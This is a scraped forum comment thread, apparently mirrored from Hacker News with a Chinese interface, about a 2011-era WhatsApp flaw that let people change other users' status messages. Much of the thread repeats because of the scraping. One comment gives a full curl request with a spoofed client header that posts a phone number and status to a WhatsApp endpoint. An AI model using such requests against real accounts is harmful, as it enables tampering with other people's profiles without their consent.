科技回声

12 条评论

alex1超过 13 年前

The site says the hole has been patched but I was just able to change my own status with this:<pre><code> curl -A "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/iPhone_4" --header "Accept-Language: en-us" --header "Accept-Encoding: gzip, deflate" --header "Connection: keep-alive" -d "cc=1&me=%2B1{10_DIGIT_NUMBER}&s={URL_ENCODED_STATUS}" https://s.whatsapp.net/client/iphone/u.php </code></pre> It did take some time to show up under my name, even after restarting the app.

chintan100超过 13 年前

Did anybody have any success with changing someone else's status with this? If so, please post.I got the success message on site and restarted the app too on iPhone by killing it from the multitasking bar but my friend's status is still unchanged.Makes me doubt it is a fraud site as BuddhaSource mentioned.

sssparkkk超过 13 年前

Some more information about this can be found here: <a href="http://packetstormsecurity.org/files/108010/SA-20111219-1.txt" rel="nofollow">http://packetstormsecurity.org/files/108010/SA-20111219-1.tx...</a>

评论 #3432803 未加载

fredley超过 13 年前

As a frequent WhatsApp user, I must say I find this more amusing than anything. I've never really understood what the status feature is for anyway.

评论 #3432749 未加载

评论 #3434052 未加载

评论 #3433064 未加载

评论 #3432877 未加载

steipete超过 13 年前

It's not changing status anymore, did they already block the site's IP?

BuddhaSource超过 13 年前

Is this a Fraud site? Not working for me.

评论 #3432789 未加载

评论 #3433004 未加载

richardburton超过 13 年前

I could not change mine. If the leak is plugged would you be willing to explain where the hole is?

jaipilot747超过 13 年前

What would the legal liabilities of this site be?

dopp超过 13 年前

dumb question - how exactly can I try this? I went to the site, but didn't find relevant information.

thelicx超过 13 年前

Not working for me.

beerglass超过 13 年前

Ridiculous!

startupcto超过 13 年前

There's a few ways that they can patch this. I'm assuming that there's some sort of auth process in place for their http calls and this could simply be a case where this particular endpoint missed the auth.Or they're simply blocking the whatsappstatus's ip and a fix would actually require both client side and server side changes.But honestly its just a messaging app and how many people really cares if "let's go grab a beer" is encrypted or not.

12 条评论

alex1超过 13 年前

chintan100超过 13 年前

sssparkkk超过 13 年前

评论 #3432803 未加载

fredley超过 13 年前

As a frequent WhatsApp user, I must say I find this more amusing than anything. I've never really understood what the status feature is for anyway.

评论 #3432749 未加载

评论 #3434052 未加载

评论 #3433064 未加载

评论 #3432877 未加载

steipete超过 13 年前

It's not changing status anymore, did they already block the site's IP?

BuddhaSource超过 13 年前

Is this a Fraud site? Not working for me.

评论 #3432789 未加载

评论 #3433004 未加载

richardburton超过 13 年前

I could not change mine. If the leak is plugged would you be willing to explain where the hole is?

jaipilot747超过 13 年前

What would the legal liabilities of this site be?

dopp超过 13 年前

dumb question - how exactly can I try this? I went to the site, but didn't find relevant information.

thelicx超过 13 年前

Not working for me.

beerglass超过 13 年前

Ridiculous!

startupcto超过 13 年前

Whatsapp security hole allows changing status message of other users

12 条评论

Whatsapp security hole allows changing status message of other users

12 条评论